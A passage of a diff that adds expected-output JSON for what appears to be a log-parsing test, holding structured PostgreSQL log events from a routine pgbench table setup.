"postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.095 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.095Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 229000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2108, + "message": "2021-03-17 15:10:42.095 UTC [137] postgres@accounts LOG: duration: 0.229 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.095 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.095Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2185, + "message": "2021-03-17 15:10:42.095 UTC [137] postgres@accounts LOG: statement: create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.095 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.096Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 
1494000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2364, + "message": "2021-03-17 15:10:42.096 UTC [137] postgres@accounts LOG: duration: 1.494 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.096 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.097Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2441, + "message": "2021-03-17 15:10:42.097 UTC [137] postgres@accounts LOG: statement: drop table if exists pgbench_branches", + "postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_branches", + "postgresql.log.timestamp": "2021-03-17 15:10:42.097 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.097Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 166000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2548, + "message": "2021-03-17 15:10:42.097 UTC [137] postgres@accounts LOG: duration: 0.166 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.097 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": 
"2021-03-17T15:10:42.097Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2625, + "message": "2021-03-17 15:10:42.097 UTC [137] postgres@accounts LOG: statement: create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.097 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.099Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 1914000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2793, + "message": "2021-03-17 15:10:42.099 UTC [137] postgres@accounts LOG: duration: 1.914 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.099 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.099Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2870, + "message": "2021-03-17 15:10:42.099 UTC [137] postgres@accounts LOG: statement: begin", + "postgresql.log.database": "accounts", + 
"postgresql.log.query": "begin", + "postgresql.log.timestamp": "2021-03-17 15:10:42.099 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.100Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 559000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2945, + "message": "2021-03-17 15:10:42.100 UTC [137] postgres@accounts LOG: duration: 0.559 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.100 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.100Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3022, + "message": "2021-03-17 15:10:42.100 UTC [137] postgres@accounts LOG: statement: insert into pgbench_branches(bid,bbalance) values(1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_branches(bid,bbalance) values(1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.100 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.100Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 399000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + 
"log.level": "LOG", + "log.offset": 3146, + "message": "2021-03-17 15:10:42.100 UTC [137] postgres@accounts LOG: duration: 0.399 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.100 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.100Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3223, + "message": "2021-03-17 15:10:42.100 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.100 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 281000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3353, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.281 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": 
"postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3430, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 90000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3560, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.090 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3637, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + 
"related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 77000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3767, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.077 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3844, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 52000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3974, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: 
duration: 0.052 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4051, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 90000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4181, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.090 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": 
"log", + "log.level": "LOG", + "log.offset": 4258, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 75000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4388, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.075 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4465, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + 
"@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 59000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4595, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.059 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4672, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 72000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4802, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.072 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 
15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.102Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4879, + "message": "2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.102 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.102Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 77000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5009, + "message": "2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: duration: 0.077 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.102 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.102Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5086, + "message": "2021-03-17 15:10:42.102 UTC [137] 
postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.102 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.102Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 73000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5217, + "message": "2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: duration: 0.073 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.102 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.102Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5294, + "message": "2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: statement: commit", + "postgresql.log.database": "accounts", + "postgresql.log.query": "commit", + "postgresql.log.timestamp": "2021-03-17 15:10:42.102 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.103Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 879000, + "event.kind": "event", + "event.module": "postgresql", + 
"event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5370, + "message": "2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: duration: 0.879 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.103 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.103Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5447, + "message": "2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: statement: begin", + "postgresql.log.database": "accounts", + "postgresql.log.query": "begin", + "postgresql.log.timestamp": "2021-03-17 15:10:42.103 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.103Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 62000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5522, + "message": "2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: duration: 0.062 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.103 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.103Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": 
"postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5599, + "message": "2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: statement: truncate pgbench_accounts", + "postgresql.log.database": "accounts", + "postgresql.log.query": "truncate pgbench_accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.103 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.103Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 363000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5694, + "message": "2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: duration: 0.363 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.103 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.103Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5771, + "message": "2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: statement: copy pgbench_accounts from stdin", + "postgresql.log.database": "accounts", + "postgresql.log.query": "copy pgbench_accounts from stdin", + "postgresql.log.timestamp": "2021-03-17 15:10:42.103 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": 
"2021-03-17T15:10:42.295Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 192094000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5873, + "message": "2021-03-17 15:10:42.295 UTC [137] postgres@accounts LOG: duration: 192.094 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.295 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.296Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5952, + "message": "2021-03-17 15:10:42.296 UTC [137] postgres@accounts LOG: statement: commit", + "postgresql.log.database": "accounts", + "postgresql.log.query": "commit", + "postgresql.log.timestamp": "2021-03-17 15:10:42.296 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.297Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 1318000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6028, + "message": "2021-03-17 15:10:42.297 UTC [137] postgres@accounts LOG: duration: 1.318 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.297 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + 
"user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.297Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6105, + "message": "2021-03-17 15:10:42.297 UTC [137] postgres@accounts LOG: statement: vacuum analyze pgbench_branches", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_branches", + "postgresql.log.timestamp": "2021-03-17 15:10:42.297 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.314Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 17051000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6206, + "message": "2021-03-17 15:10:42.314 UTC [137] postgres@accounts LOG: duration: 17.051 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.314 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.314Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6284, + "message": "2021-03-17 15:10:42.314 UTC [137] postgres@accounts LOG: statement: vacuum analyze pgbench_tellers", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_tellers", + 
